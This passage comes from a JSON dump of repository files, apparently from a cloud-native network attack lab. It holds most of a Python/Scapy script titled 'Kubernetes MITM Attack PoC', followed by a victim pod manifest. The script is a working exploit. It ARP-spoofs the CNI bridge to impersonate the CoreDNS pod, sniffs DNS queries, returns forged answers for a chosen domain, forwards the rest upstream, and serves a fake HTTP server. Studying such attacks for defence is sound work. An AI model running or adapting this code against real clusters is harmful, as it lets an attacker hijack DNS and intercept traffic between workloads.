server\n        req_domain = req_pkt[DNSQR].qname\n        def parse_responses(p): return ', '.join(\n            [str(p[DNSRR][x].rdata) for x in range(p[DNS].ancount)])\n\n        # if local, get response from kube-dns\n        if self.is_local_domain(req_domain):\n            answer = sr1(IP(dst=self.local_server_ip) / UDP() / DNS(rd=0,\n                                                                    id=req_pkt[DNS].id,\n                                                                    qd=DNSQR(qname=req_domain)),\n                         verbose=verbose,\n                         timeout=1)\n            resp_pkt = Ether(\n                src=self.local_server_mac) / IP(\n                dst=req_pkt[IP].src,\n                src=self.local_server_ip) / UDP(\n                sport=53,\n                dport=req_pkt[UDP].sport) / DNS()\n            # if timeout, returning NXDOMAIN\n            if answer:\n                resp_pkt[DNS] = answer[DNS]\n            else:\n                resp_pkt[DNS] = self.generate_response(req_pkt, nx=True)\n            sendp(resp_pkt, verbose=verbose)\n            print(\"[+] {} <- KUBE-DNS response {} - {}\".format(resp_pkt[IP].dst, str(req_domain),\n                                                               parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0\n                                                               else resp_pkt[DNS].rcode))\n        # else, get with upstream\n        else:\n            answer = sr1(IP(dst=self.upstream_server) / UDP() /\n                         DNS(rd=1, qd=DNSQR(qname=req_domain)), verbose=verbose)\n            resp_pkt = Ether(\n                src=self.local_server_mac) / IP(\n                dst=req_pkt[IP].src,\n                src=self.local_server_ip) / UDP(\n                sport=53,\n                dport=req_pkt[UDP].sport) / DNS()\n            resp_pkt[DNS] = answer[DNS]\n            resp_pkt[DNS].id = req_pkt[DNS].id\n            sendp(resp_pkt, verbose=verbose)\n            print(\"[+] {} <- UPSTREAM response {} - {}\".format(resp_pkt[IP].dst, str(req_domain),\n                                                               parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0\n                                                               else resp_pkt[DNS].rcode))\n\n    def spoof(self, req_pkt):\n        spf_resp = IP(dst=req_pkt[IP].src,\n                      src=self.local_server_ip) / UDP(dport=req_pkt[UDP].sport,\n                                                      sport=53) / self.generate_response(req_pkt,\n                                                                                         ip=self.ip)\n\n        send(spf_resp, verbose=0, iface=self.interface)\n        print(\"[+] Spoofed response to: {} | {} is at {}\".format(spf_resp[IP].dst,\n                                                                 str(req_pkt[\"DNS Question Record\"].qname), self.ip))\n\n    def handle_queries(self, req_pkt):\n        \"\"\" decides whether to spoof or forward the packet \"\"\"\n        if req_pkt[\"DNS Question Record\"].qname.startswith(self.fake_domain.encode(\n                'utf-8')):\n            self.spoof(req_pkt)\n        else:\n            self.forward(req_pkt, verbose=False)\n\n    def dns_req_filter(self, pkt):\n        return (UDP in pkt and\n                DNS in pkt and\n                pkt[DNS].opcode == 0 and\n                pkt[DNS].ancount == 0 and\n                pkt[UDP].dport == 53 and\n                pkt[Ether].dst == self.mac and\n                pkt[IP].dst == self.local_server_ip)\n\n    def start(self):\n        # sniffing and filtering dns queries sent to self\n        sniff(\n            lfilter=self.dns_req_filter,\n            prn=self.handle_queries,\n            iface=self.interface,\n            store=False)\n\n\ndef get_self_mac_ip():\n    return Ether().src, ARP().psrc\n\n\ndef get_kube_dns_svc_ip():\n    with open('/etc/resolv.conf', 'r') as f:\n        return f.readline().strip().split(' ')[1]\n\n\ndef get_coredns_pod_mac_ip(kube_dns_svc_ip, self_ip, verbose):\n    mac = srp1(Ether() / IP(dst=kube_dns_svc_ip) /\n               UDP(dport=53) / DNS(rd=1, qd=DNSQR()), verbose=verbose).src\n    answers, _ = srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\") /\n                     ARP(pdst=\"{}/24\".format(self_ip)), timeout=4, verbose=verbose)\n    for answer in answers:\n        if answer[1].src == mac:\n            return mac, answer[1][ARP].psrc\n\n    return None, None\n\n\ndef get_bridge_mac_ip(verbose):\n    res = srp1(Ether() / IP(dst=\"8.8.8.8\", ttl=1) / ICMP(), verbose=verbose)\n    return res[Ether].src, res[IP].src\n\n\ndef arp_spoofing(bridge_ip, coredns_pod_ip,\n                 bridge_mac, verbose):\n    while True:\n        send(ARP(op=2,\n                 pdst=bridge_ip,\n                 psrc=coredns_pod_ip,\n                 hwdst=bridge_mac),\n             verbose=verbose)\n\n\ndef fake_http_server():\n    server_address = ('', 80)\n    server = HTTPServer(server_address, S)\n    server.serve_forever()\n\n\ndef main(verbose):\n    print(\"Kubernetes MITM Attack PoC\")\n\n    print(\"[*] Starting HTTP Server at 80...\")\n    p1 = Process(target=fake_http_server)\n    p1.start()\n\n    self_mac, self_ip = get_self_mac_ip()\n    print(\"[+] Current pod IP: %s, MAC: %s\" % (self_ip, self_mac))\n    kube_dns_svc_ip = get_kube_dns_svc_ip()\n    print(\"[+] Kubernetes DNS service IP: %s\" % kube_dns_svc_ip)\n    coredns_pod_mac, coredns_pod_ip = get_coredns_pod_mac_ip(\n        kube_dns_svc_ip, self_ip, verbose=verbose)\n    print(\"[+] CoreDNS pod IP: %s, MAC: %s\" %\n          (coredns_pod_ip, coredns_pod_mac))\n    bridge_mac, bridge_ip = get_bridge_mac_ip(verbose=verbose)\n    print(\"[+] CNI bridge IP: %s, MAC: %s\" % (bridge_ip, bridge_mac))\n\n    print(\"[*] Starting ARP spoofing...\")\n    p2 = Process(\n        target=arp_spoofing,\n        args=(\n            bridge_ip,\n            coredns_pod_ip,\n            bridge_mac,\n            verbose))\n    p2.start()\n\n    print(\"[*] Starting DNS proxy...\")\n    # proxy dns query and response\n    dns_proxy = DnsProxy(\n        upstream_server=\"8.8.8.8\",\n        local_server_mac=coredns_pod_mac,\n        local_server_ip=coredns_pod_ip,\n        self_mac=self_mac,\n        self_ip=self_ip,\n        fake_domain=sys.argv[1],\n        interface='eth0')\n    p3 = Process(target=dns_proxy.start)\n    p3.start()\n\n    while True:\n        time.sleep(1)\n\n\ndef usage():\n    print(\n        \"Usage:\\n\\tpython3 {} target_domain\".format(\n            sys.argv[0]))\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 2:\n        usage()\n    else:\n        main(verbose=False)\n"
  },
  {
    "path": "code/0405-云原生网络攻击/victim.yaml",
    "content": "# victim pod\napiVersion: v1\nkind: Pod\nmetadata:\n  name: victim\nspec:\n  containers:\n  - name: main\n    image: curlimages/curl:latest\n    imagePullPolicy: IfNotPresent\n    # Just spin & wait forever\n    command: [ \"/bin/sh\", \"-c\", \"--\" ]\n    args: [ \"while true; do sleep 30; done;\" ]"
  }
]